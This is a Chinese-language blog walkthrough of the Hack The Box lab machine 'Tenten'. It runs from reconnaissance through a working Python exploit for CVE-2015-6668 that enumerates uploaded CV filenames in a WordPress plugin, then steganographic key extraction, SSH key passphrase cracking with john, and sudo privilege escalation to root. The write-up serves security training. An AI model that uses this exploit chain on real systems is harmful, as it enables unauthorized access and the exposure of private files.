Hack The Box —— Tenten


Hack The Box —— Tenten

信息搜集

nmap

nmap -T4 -A -v 10.10.10.6

发现服务器开了 22 端口和 80 端口浏览器访问 http 服务,发现 wordpress 站点。

漏洞扫描

利用 wpscan 工具扫描一波 wordpress 站的信息:

wpscan --enumerate t --enumerate p --enumerate u --url=http://10.10.10.10/

发现用户名:

插件漏洞:

漏洞利用

搜索 Job-Manager 相关漏洞,发现,用户可以利用该插件可以上传 CV。由于 wordpress 上传的文件存放在 upload/year/month/filename 下,因此可以爆破出上传的 CV 文件,从而造成信息泄漏。

首先访问 Jobs Listing

apply now 下获取 job 详细信息:

更改 url 中的 number 值,可以得到其它的 JOB APPLICATION
使用如下命令,枚举 job title

发现 HackerAccessGranted title,尝试使用 exp 进行用户上传 cv 的枚举:

import requests

print """  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  
"""  
website = raw_input('Enter a vulnerable website: ')  
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2016,2019):  
    for i in range(1,13):
        for extension in {'php','html','pdf','png','gif','jpg','jpeg'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            print URL
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

发现如下敏感文件:

访问,得到一张图片。

猜测图片隐写,使用 steghide extract -sf HackerAccessGranted.jpg,得到 id_rsa 文件。

id_rsa文件内容

打开 id_rsa 文件,发现该文件被加密:

使用 ssh2john 脚本文件将加密的内容转化为 john 可以破解的文件

python2 ssh2john id_rsa > ssh_login

得到:

使用 john 进行密码破解:

john ssh_login --wordlist=rockyou.txt

得到 id_rsa 的密码:superpassword

尝试登录服务器:

ssh -i id_rsa takis@10.10.10.10

得到第一个 flag

尝试进入 root 目录,发现权限不足。
使用 sudo -l 命令,查看无需密码课执行的命令:

发现 /bin/fuckin 文件,查看文件内容:

执行:sudo /bin/fuckin /bin/bash,即可获得 root 权限:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
  目录